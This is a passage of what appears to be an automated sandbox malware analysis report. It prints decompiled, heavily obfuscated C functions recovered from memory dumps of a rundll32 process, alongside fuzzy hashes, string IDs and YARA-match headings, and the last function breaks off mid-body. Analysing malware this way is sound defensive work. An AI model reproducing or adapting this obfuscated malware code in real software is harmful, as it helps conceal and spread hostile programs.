                                                                      • Instruction Fuzzy Hash: 718164719083419BD358CE25D88985BBFF1BFC4768F004A1DF68A962A0D7B9CA08CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :&$VBp?$q5$L$d
                                                                      • API String ID: 0-1357951408
                                                                      • Opcode ID: 9625934489e2dad54f0a0194016c640e6ad5100f496de32f8f15a457e04f42a4
                                                                      • Instruction ID: 84a74fb69e9156b858384bff39ac040cb27367c5ed631b36efa1248e806faaec
                                                                      • Opcode Fuzzy Hash: 9625934489e2dad54f0a0194016c640e6ad5100f496de32f8f15a457e04f42a4
                                                                      • Instruction Fuzzy Hash: 518183B15183419BD358CE25D88A81FBBF0FBC4768F404A1CF58A962A0D3B8CA58CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E02009DBF() {
                                                                      				char _v520;
                                                                      				signed int _v524;
                                                                      				intOrPtr _v528;
                                                                      				signed int _v532;
                                                                      				signed int _v536;
                                                                      				signed int _v540;
                                                                      				signed int _v544;
                                                                      				signed int _v548;
                                                                      				signed int _v552;
                                                                      				signed int _v556;
                                                                      				signed int _v560;
                                                                      				signed int _v564;
                                                                      				signed int _v568;
                                                                      				signed int _t123;
                                                                      				signed int _t126;
                                                                      				signed int _t129;
                                                                      				signed int _t130;
                                                                      				void* _t131;
                                                                      				signed int _t135;
                                                                      				signed int _t150;
                                                                      				signed int _t151;
                                                                      				signed int _t152;
                                                                      				signed int _t153;
                                                                      				signed int _t155;
                                                                      				signed int _t157;
                                                                      				signed int* _t158;
                                                                      
                                                                      				_t158 =  &_v568;
                                                                      				_v528 = 0x60d9f0;
                                                                      				_t155 = 0;
                                                                      				_t131 = 0x15228660;
                                                                      				_v524 = 0;
                                                                      				_v548 = 0xcd57;
                                                                      				_t150 = 0x7d;
                                                                      				_v548 = _v548 / _t150;
                                                                      				_v548 = _v548 << 4;
                                                                      				_v548 = _v548 ^ 0x00004d7f;
                                                                      				_v568 = 0x7da6;
                                                                      				_v568 = _v568 ^ 0x9d4dffd0;
                                                                      				_v568 = _v568 + 0x4fb1;
                                                                      				_v568 = _v568 ^ 0x61a60d8b;
                                                                      				_v568 = _v568 ^ 0xfceba89c;
                                                                      				_v564 = 0xc0eb;
                                                                      				_v564 = _v564 + 0xfffff60a;
                                                                      				_v564 = _v564 + 0x7921;
                                                                      				_v564 = _v564 | 0xce5d4b47;
                                                                      				_v564 = _v564 ^ 0xce5d5527;
                                                                      				_v560 = 0xb537;
                                                                      				_v560 = _v560 ^ 0xfff7bf7c;
                                                                      				_v560 = _v560 ^ 0xfff72356;
                                                                      				_v552 = 0x7344;
                                                                      				_t151 = 0x5d;
                                                                      				_v552 = _v552 / _t151;
                                                                      				_v552 = _v552 ^ 0x4bec447d;
                                                                      				_v552 = _v552 ^ 0x4bec1377;
                                                                      				_v532 = 0x249f;
                                                                      				_v532 = _v532 | 0xc4145615;
                                                                      				_v532 = _v532 ^ 0xc4142924;
                                                                      				_v536 = 0x1806;
                                                                      				_t152 = 0x57;
                                                                      				_t157 = _v560;
                                                                      				_t130 = _v560;
                                                                      				_v536 = _v536 * 0x50;
                                                                      				_v536 = _v536 ^ 0x00078d58;
                                                                      				_v556 = 0x1833;
                                                                      				_v556 = _v556 << 0xc;
                                                                      				_v556 = _v556 + 0xffff5490;
                                                                      				_v556 = _v556 ^ 0x0182d013;
                                                                      				_v540 = 0x2b82;
                                                                      				_v540 = _v540 / _t152;
                                                                      				_v540 = _v540 ^ 0x00005334;
                                                                      				_v544 = 0xc7f0;
                                                                      				_t153 = 0x6c;
                                                                      				_t154 = _v560;
                                                                      				_v544 = _v544 / _t153;
                                                                      				_v544 = _v544 ^ 0x00002c79;
                                                                      				do {
                                                                      					while(_t131 != 0x1f7477) {
                                                                      						if(_t131 == 0x2a2b494) {
                                                                      							_t123 = E01FFA525(_v568, __eflags,  &_v520, _t154, _v564);
                                                                      							_t158 =  &(_t158[3]);
                                                                      							__eflags = _t123;
                                                                      							if(__eflags == 0) {
                                                                      								L18:
                                                                      								return _t155;
                                                                      							}
                                                                      							_t131 = 0x1f7477;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t131 == 0x3351846) {
                                                                      							_t126 = E02000CCD();
                                                                      							_t154 = _t126;
                                                                      							__eflags = _t126;
                                                                      							if(__eflags == 0) {
                                                                      								goto L18;
                                                                      							}
                                                                      							_t131 = 0x2a2b494;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t131 == 0x8686635) {
                                                                      							_v568 = 0xbfc3;
                                                                      							_t135 = 0x65;
                                                                      							_v568 = _v568 / _t135;
                                                                      							_v568 = _v568 | 0xe5cb59f9;
                                                                      							_v568 = _v568 + 0xffffe272;
                                                                      							_v568 = _v568 ^ 0xcfec3c93;
                                                                      							__eflags = _t130 - _v568;
                                                                      							if(_t130 == _v568) {
                                                                      								_t155 = 1;
                                                                      								__eflags = 1;
                                                                      							}
                                                                      							goto L18;
                                                                      						}
                                                                      						if(_t131 == 0x15228660) {
                                                                      							_t131 = 0x3351846;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t131 != 0x2e9709f0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						_t129 = E01FF165C(_t157, _v536, _v556, _v540, _v544);
                                                                      						_t158 =  &(_t158[3]);
                                                                      						_t130 = _t129;
                                                                      						_t131 = 0x8686635;
                                                                      					}
                                                                      					_t157 = E01FFBDCC( &_v520, _v560, _v552, _v532);
                                                                      					_t131 = 0x2e9709f0;
                                                                      					L14:
                                                                      					__eflags = _t131 - 0x2a22e55c;
                                                                      				} while (__eflags != 0);
                                                                      				goto L18;
                                                                      			}






























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !y$4S$\"*$y,$}DK
                                                                      • API String ID: 0-1385372798
                                                                      • Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction ID: 77e9d6bf44211a8b1516bdb94ad6bed79b269aced7a32c70c6e024884defe2e8
                                                                      • Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction Fuzzy Hash: 6F5189715083418BE398CF24C58892FBBE1FBC8758F144A1EF599962A0D7B5CA49CF83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !y$4S$\"*$y,$}DK
                                                                      • API String ID: 0-1385372798
                                                                      • Opcode ID: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction ID: 3b9d027a5195e404b4edb673bddf9dad6efd999cebdfcac450c5ed3ab61cdd71
                                                                      • Opcode Fuzzy Hash: c6bc460363a2c09036b62d10915c1b1c596fd8f2df469f83b3e0c7a2eb85769a
                                                                      • Instruction Fuzzy Hash: 6B5177715183428FD358CF24C58991FBBE1BBC8758F604A1EF58996260C7B4CA5A8F83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E02009B4A(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                      				signed int _v4;
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				unsigned int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				void* _t139;
                                                                      				intOrPtr _t141;
                                                                      				intOrPtr _t150;
                                                                      				signed int _t151;
                                                                      				signed int _t152;
                                                                      				signed int _t153;
                                                                      				signed int _t154;
                                                                      				intOrPtr _t156;
                                                                      				intOrPtr _t157;
                                                                      				intOrPtr _t173;
                                                                      				intOrPtr* _t174;
                                                                      				void* _t175;
                                                                      				intOrPtr _t176;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_v4 = _v4 & 0x00000000;
                                                                      				_v16 = 0x24c8e6;
                                                                      				_v12 = 0x512e7e;
                                                                      				_v64 = 0xe6d4;
                                                                      				_v64 = _v64 + 0xffffc62e;
                                                                      				_v64 = _v64 ^ 0x62da4f4f;
                                                                      				_v64 = _v64 + 0x4b4;
                                                                      				_v64 = _v64 ^ 0x62daac72;
                                                                      				_v36 = 0x1dac;
                                                                      				_t151 = 0xc;
                                                                      				_v36 = _v36 / _t151;
                                                                      				_v36 = _v36 ^ 0x000026fb;
                                                                      				_v60 = 0xf2ce;
                                                                      				_v60 = _v60 + 0x7932;
                                                                      				_t152 = 0x4d;
                                                                      				_v60 = _v60 / _t152;
                                                                      				_t153 = 0x3b;
                                                                      				_v60 = _v60 * 0x21;
                                                                      				_v60 = _v60 ^ 0x00008d5c;
                                                                      				_v32 = 0x9fef;
                                                                      				_v32 = _v32 ^ 0xbf11c352;
                                                                      				_v32 = _v32 ^ 0xbf1108c7;
                                                                      				_v40 = 0x93bf;
                                                                      				_v40 = _v40 + 0xffffb4ac;
                                                                      				_v40 = _v40 / _t153;
                                                                      				_v40 = _v40 ^ 0x00007264;
                                                                      				_v44 = 0x3ea3;
                                                                      				_v44 = _v44 | 0x1bb7f55d;
                                                                      				_v44 = _v44 << 1;
                                                                      				_v44 = _v44 ^ 0x376fc359;
                                                                      				_v24 = 0xe782;
                                                                      				_v24 = _v24 + 0xffff9e28;
                                                                      				_v24 = _v24 ^ 0x0000d291;
                                                                      				_v28 = 0xff08;
                                                                      				_v28 = _v28 >> 9;
                                                                      				_v28 = _v28 ^ 0x000057fc;
                                                                      				_v48 = 0x3b3e;
                                                                      				_v48 = _v48 << 9;
                                                                      				_t154 = 0x19;
                                                                      				_v48 = _v48 * 0x7b;
                                                                      				_v48 = _v48 >> 6;
                                                                      				_v48 = _v48 ^ 0x00e3c1df;
                                                                      				_v20 = 0x1063;
                                                                      				_v20 = _v20 + 0xffffa595;
                                                                      				_v20 = _v20 ^ 0xffffc157;
                                                                      				_v52 = 0xa2f2;
                                                                      				_v52 = _v52 >> 8;
                                                                      				_v52 = _v52 + 0xffff5a4e;
                                                                      				_v52 = _v52 + 0xb28b;
                                                                      				_v52 = _v52 ^ 0x00000530;
                                                                      				_v56 = 0x99a4;
                                                                      				_v56 = _v56 / _t154;
                                                                      				_v56 = _v56 + 0xfffff33a;
                                                                      				_v56 = _v56 + 0xffffe1ed;
                                                                      				_v56 = _v56 ^ 0xfffff62c;
                                                                      				_t139 = E02001999();
                                                                      				_t173 = _a4;
                                                                      				_t175 = _t139;
                                                                      				_v64 = 0x5a09;
                                                                      				_v64 = _v64 + 0x27ad;
                                                                      				_v64 = _v64 + 0xa7ad;
                                                                      				_v64 = _v64 ^ 0x00012963;
                                                                      				_t177 = _t173 + 0x24;
                                                                      				_t150 = E01FF165C(_t173 + 0x24, _v60, _v32, _v40, _v44);
                                                                      				_t141 =  *((intOrPtr*)(_t173 + 8));
                                                                      				if(_t141 != _v64 && _t141 != _t175) {
                                                                      					_t156 =  *((intOrPtr*)(_t173 + 0x18));
                                                                      					if(_t156 != _v64 && _t156 != _t175) {
                                                                      						_t174 = _a8;
                                                                      						_t157 =  *_t174;
                                                                      						if(E01FFE9C1(_t157, _t150) == 0) {
                                                                      							_push(_t157);
                                                                      							_t176 = E01FF54FB(0x224);
                                                                      							if(_t176 != 0) {
                                                                      								_t121 = _t176 + 0x1c; // 0x1c
                                                                      								E020003F1(_v48, _v20, _t177, _t121, _v52, _v56);
                                                                      								 *((intOrPtr*)(_t176 + 0x10)) = _t150;
                                                                      								 *((intOrPtr*)(_t176 + 8)) =  *_t174;
                                                                      								 *_t174 = _t176;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return 1;
                                                                      			}

































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Z$2y$>;$dr$~.Q
                                                                      • API String ID: 0-1863639504
                                                                      • Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction ID: 14a1cab2476825c75700d6cdc8dbe5f035e246d51edb2eedc6a1819f2404edbf
                                                                      • Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction Fuzzy Hash: 356122725083429FE384DF25C48951BBBF1BBE4758F105A1DF0E5962A0D3B8DA49CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Z$2y$>;$dr$~.Q
                                                                      • API String ID: 0-1863639504
                                                                      • Opcode ID: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction ID: 4d890f59e7929f5096b40aa96a5aef9d67594f59db4a56c87ac0d3582440e07a
                                                                      • Opcode Fuzzy Hash: 362973f93a2b514eb754f0ddddcba1e6eef7afd247888ddaa3660755bd7a2033
                                                                      • Instruction Fuzzy Hash: AE6121715083429FD388DF25C48951BBBE1BFD4368F505A1DF0D59A2A0D3B8DA99CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E01FFBB96(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				char _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				void* _t106;
                                                                      				void* _t118;
                                                                      				void* _t123;
                                                                      				void* _t125;
                                                                      				intOrPtr _t142;
                                                                      				signed int _t143;
                                                                      				signed int _t144;
                                                                      				signed int _t145;
                                                                      				void* _t147;
                                                                      				void* _t148;
                                                                      
                                                                      				_push(_a8);
                                                                      				_t141 = _a4;
                                                                      				_t123 = __edx;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t106);
                                                                      				_v80 = 0x2da5ed;
                                                                      				_t148 = _t147 + 0x10;
                                                                      				_t142 = 0;
                                                                      				_v76 = 0;
                                                                      				_t125 = 0x345de67e;
                                                                      				_v72 = 0;
                                                                      				_v100 = 0x5d99;
                                                                      				_t143 = 9;
                                                                      				_v100 = _v100 / _t143;
                                                                      				_v100 = _v100 + 0x3ccb;
                                                                      				_v100 = _v100 ^ 0x0000340e;
                                                                      				_v84 = 0xb7f0;
                                                                      				_v84 = _v84 >> 6;
                                                                      				_v84 = _v84 ^ 0x00004e6b;
                                                                      				_v104 = 0x2472;
                                                                      				_v104 = _v104 << 0xb;
                                                                      				_v104 = _v104 | 0x2ee3a515;
                                                                      				_v104 = _v104 ^ 0x2fe3eebe;
                                                                      				_v108 = 0xd2e1;
                                                                      				_v108 = _v108 + 0xffff0d62;
                                                                      				_t144 = 0x14;
                                                                      				_v108 = _v108 / _t144;
                                                                      				_v108 = _v108 ^ 0x0cccdcb2;
                                                                      				_v112 = 0x5926;
                                                                      				_v112 = _v112 + 0xdeb5;
                                                                      				_v112 = _v112 << 6;
                                                                      				_v112 = _v112 << 0xc;
                                                                      				_v112 = _v112 ^ 0xdf6c425e;
                                                                      				_v96 = 0x379b;
                                                                      				_v96 = _v96 << 1;
                                                                      				_t145 = 0x6d;
                                                                      				_v96 = _v96 * 0x46;
                                                                      				_v96 = _v96 ^ 0x001e434e;
                                                                      				_v116 = 0x863a;
                                                                      				_v116 = _v116 * 0x52;
                                                                      				_v116 = _v116 + 0xffff0085;
                                                                      				_v116 = _v116 + 0x7cb6;
                                                                      				_v116 = _v116 ^ 0x002a75a4;
                                                                      				_v120 = 0x5588;
                                                                      				_v120 = _v120 / _t145;
                                                                      				_v120 = _v120 << 1;
                                                                      				_v120 = _v120 << 3;
                                                                      				_v120 = _v120 ^ 0x00002108;
                                                                      				_v88 = 0xce65;
                                                                      				_v88 = _v88 ^ 0x25948ee5;
                                                                      				_v88 = _v88 * 0x2e;
                                                                      				_v88 = _v88 ^ 0xc0a3e1fe;
                                                                      				_v92 = 0x75c8;
                                                                      				_v92 = _v92 + 0x1df4;
                                                                      				_v92 = _v92 + 0xffff92c4;
                                                                      				_v92 = _v92 ^ 0x00004c1f;
                                                                      				do {
                                                                      					while(_t125 != 0x128fa6f3) {
                                                                      						if(_t125 == 0x1c314bcc) {
                                                                      							E01FFFEE3(_t123,  &_v68, _v100, _v84, _v104, _v108);
                                                                      							_t148 = _t148 + 0x10;
                                                                      							_t125 = 0x128fa6f3;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t125 == 0x1efca616) {
                                                                      								__eflags = E01FFBAA2( &_v68, _v88, _v92, _t141 + 8);
                                                                      								_t142 =  !=  ? 1 : _t142;
                                                                      							} else {
                                                                      								if(_t125 != 0x345de67e) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									_t125 = 0x1c314bcc;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L13:
                                                                      						return _t142;
                                                                      					}
                                                                      					_t118 = E01FFF914(_v112, _v96, __eflags, _v116, _t141, _v120,  &_v68);
                                                                      					_t148 = _t148 + 0x10;
                                                                      					__eflags = _t118;
                                                                      					if(__eflags == 0) {
                                                                      						_t125 = 0xd121e29;
                                                                      						goto L10;
                                                                      					} else {
                                                                      						_t125 = 0x1efca616;
                                                                      						continue;
                                                                      					}
                                                                      					goto L13;
                                                                      					L10:
                                                                      					__eflags = _t125 - 0xd121e29;
                                                                      				} while (__eflags != 0);
                                                                      				goto L13;
                                                                      			}




























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &Y$kN$r$$~]4$~]4
                                                                      • API String ID: 0-4213572440
                                                                      • Opcode ID: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
                                                                      • Instruction ID: 639556a9901f149ea7cc918df2f1efe9d3ebe5e57fb28a652162722d22fcc718
                                                                      • Opcode Fuzzy Hash: 6d30ab10f811253cee70124cb9438b03b89891d3452d97be3356d03eb539d255
                                                                      • Instruction Fuzzy Hash: C0514571508341AFE358CF25C89982FBBE1FFD4B58F404A1EF685562A0D3B6CA498B43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &Y$kN$r$$~]4$~]4
                                                                      • API String ID: 0-4213572440
                                                                      • Opcode ID: 241dbdd6d2babb46e9ee13cc0325bded3d4adcccd0ed996a5176e7e6602560ba
                                                                      • Instruction ID: e4834b1cd83636764c6e21c74fb977922df87a78caf8a6d750f700b7aabd8388
                                                                      • Opcode Fuzzy Hash: 241dbdd6d2babb46e9ee13cc0325bded3d4adcccd0ed996a5176e7e6602560ba
                                                                      • Instruction Fuzzy Hash: 5E5166B15183019FE759CF21C98982FBBE1FBC4B58F404A1EF689562A0D3B5CA59CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E02001F88() {
                                                                      				char _v520;
                                                                      				signed int _v524;
                                                                      				signed int _v528;
                                                                      				signed int _v532;
                                                                      				signed int _v536;
                                                                      				signed int _v540;
                                                                      				signed int _v544;
                                                                      				signed int _v548;
                                                                      				signed int _v552;
                                                                      				signed int _v556;
                                                                      				signed int _v560;
                                                                      				char* _t108;
                                                                      				void* _t113;
                                                                      				signed int _t116;
                                                                      				signed int _t127;
                                                                      				short* _t128;
                                                                      				signed int* _t131;
                                                                      
                                                                      				_t131 =  &_v560;
                                                                      				_v532 = 0xdf77;
                                                                      				_v532 = _v532 | 0xf1b1db65;
                                                                      				_t113 = 0x2283ac23;
                                                                      				_v532 = _v532 >> 6;
                                                                      				_v532 = _v532 ^ 0x03c6ff13;
                                                                      				_v544 = 0xdd97;
                                                                      				_v544 = _v544 >> 0xb;
                                                                      				_v544 = _v544 ^ 0x7831024e;
                                                                      				_v544 = _v544 ^ 0x78315e83;
                                                                      				_v536 = 0xeb3d;
                                                                      				_v536 = _v536 << 4;
                                                                      				_v536 = _v536 ^ 0x56aecc65;
                                                                      				_v536 = _v536 ^ 0x56a04d5b;
                                                                      				_v524 = 0x8c08;
                                                                      				_v524 = _v524 | 0x5902e3b1;
                                                                      				_v524 = _v524 ^ 0x5902aa3b;
                                                                      				_v552 = 0xfdc1;
                                                                      				_v552 = _v552 * 0x29;
                                                                      				_t127 = 0x1d;
                                                                      				_v552 = _v552 * 0x66;
                                                                      				_v552 = _v552 / _t127;
                                                                      				_v552 = _v552 ^ 0x008eebdb;
                                                                      				_v556 = 0x4ae2;
                                                                      				_v556 = _v556 + 0xffff2c78;
                                                                      				_v556 = _v556 + 0xdee6;
                                                                      				_v556 = _v556 >> 0x10;
                                                                      				_v556 = _v556 ^ 0x000006e5;
                                                                      				_v528 = 0xfda8;
                                                                      				_v528 = _v528 << 0xf;
                                                                      				_v528 = _v528 ^ 0x7ed4787e;
                                                                      				_v540 = 0xbfac;
                                                                      				_v540 = _v540 >> 7;
                                                                      				_t128 = _v528;
                                                                      				_v540 = _v540 * 0x19;
                                                                      				_v540 = _v540 ^ 0x00004b65;
                                                                      				_v560 = 0xd500;
                                                                      				_v560 = _v560 * 0x6a;
                                                                      				_v560 = _v560 >> 3;
                                                                      				_v560 = _v560 + 0x9ecd;
                                                                      				_v560 = _v560 ^ 0x000bcd88;
                                                                      				L1:
                                                                      				while(_t113 != 0xb1bd1f2) {
                                                                      					if(_t113 == 0x109d50bf) {
                                                                      						_push(_t113);
                                                                      						_t108 = E01FFDFD8(_v532,  &_v520, __eflags, _v544, _v536);
                                                                      						_t131 =  &(_t131[3]);
                                                                      						_t113 = 0x26f0d27d;
                                                                      						continue;
                                                                      					} else {
                                                                      						if(_t113 == 0x2283ac23) {
                                                                      							_t113 = 0x109d50bf;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t113 == 0x26f0d27d) {
                                                                      								_v548 = 0x7bf9;
                                                                      								_t116 = 0x44;
                                                                      								_v548 = _v548 / _t116;
                                                                      								_v548 = _v548 << 0xb;
                                                                      								_v548 = _v548 ^ 0x000e9002;
                                                                      								_t128 =  &_v520 + E0200232B(_v524,  &_v520, _v552) * 2;
                                                                      								while(1) {
                                                                      									_t108 =  &_v520;
                                                                      									if(_t128 <= _t108) {
                                                                      										break;
                                                                      									}
                                                                      									__eflags =  *_t128 - 0x5c;
                                                                      									if( *_t128 != 0x5c) {
                                                                      										L8:
                                                                      										_t128 = _t128 - 2;
                                                                      										__eflags = _t128;
                                                                      										continue;
                                                                      									} else {
                                                                      										_t88 =  &_v548;
                                                                      										 *_t88 = _v548 - 1;
                                                                      										__eflags =  *_t88;
                                                                      										if( *_t88 == 0) {
                                                                      											__eflags = _t128;
                                                                      										} else {
                                                                      											goto L8;
                                                                      										}
                                                                      									}
                                                                      									L12:
                                                                      									_t113 = 0xb1bd1f2;
                                                                      									goto L1;
                                                                      								}
                                                                      								goto L12;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L16:
                                                                      					__eflags = _t113 - 0x20ed6828;
                                                                      					if(__eflags != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					return _t108;
                                                                      				}
                                                                      				__eflags =  *0x2011088 + 0x38;
                                                                      				E020003F1(_v556, _v528, _t128,  *0x2011088 + 0x38, _v540, _v560);
                                                                      				_t131 =  &(_t131[4]);
                                                                      				_t113 = 0x20ed6828;
                                                                      				goto L16;
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (h $(h $=$eK$J
                                                                      • API String ID: 0-3161474748
                                                                      • Opcode ID: 4d2485bd24f02287eff72440a9d10f9311ca1f01650303c177082e87438b2de7
                                                                      • Instruction ID: ed612ba61d223b9070b3e89970f8c391a3829570f2cd19e950bed9253d116210
                                                                      • Opcode Fuzzy Hash: 4d2485bd24f02287eff72440a9d10f9311ca1f01650303c177082e87438b2de7
                                                                      • Instruction Fuzzy Hash: 495152B15083428FE759CF24C88941FBBE1FBE4748F504D1EF596962A0D3B48A4ADB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (h $(h $=$eK$J
                                                                      • API String ID: 0-3161474748
                                                                      • Opcode ID: 86af4110603e91391cb94e6655895d576302203bbf1cfb34b4362cab8880e58e
                                                                      • Instruction ID: bfb949fa54a2e2b2a8f81b97a21acd8fcfd924a2720da206292756a4ead6db52
                                                                      • Opcode Fuzzy Hash: 86af4110603e91391cb94e6655895d576302203bbf1cfb34b4362cab8880e58e
                                                                      • Instruction Fuzzy Hash: 605165B15183428BD758CF25C88941FBBE5FBD4748F144D1EF492962A0D3B0CAAACF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E01FFA2D2() {
                                                                      				signed int _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _t100;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t106;
                                                                      				signed int _t110;
                                                                      				signed int _t111;
                                                                      				signed int _t112;
                                                                      				intOrPtr _t113;
                                                                      				signed int _t121;
                                                                      				void* _t124;
                                                                      				signed int* _t126;
                                                                      
                                                                      				_t126 =  &_v36;
                                                                      				_v32 = 0x28a4;
                                                                      				_t110 = 0x7a;
                                                                      				_v32 = _v32 / _t110;
                                                                      				_v32 = _v32 + 0x1ce1;
                                                                      				_t124 = 0x1fa14ba;
                                                                      				_t111 = 0x6a;
                                                                      				_v32 = _v32 * 0x39;
                                                                      				_v32 = _v32 ^ 0x0006d499;
                                                                      				_v36 = 0xda62;
                                                                      				_v36 = _v36 | 0x19bfccda;
                                                                      				_v36 = _v36 * 0x11;
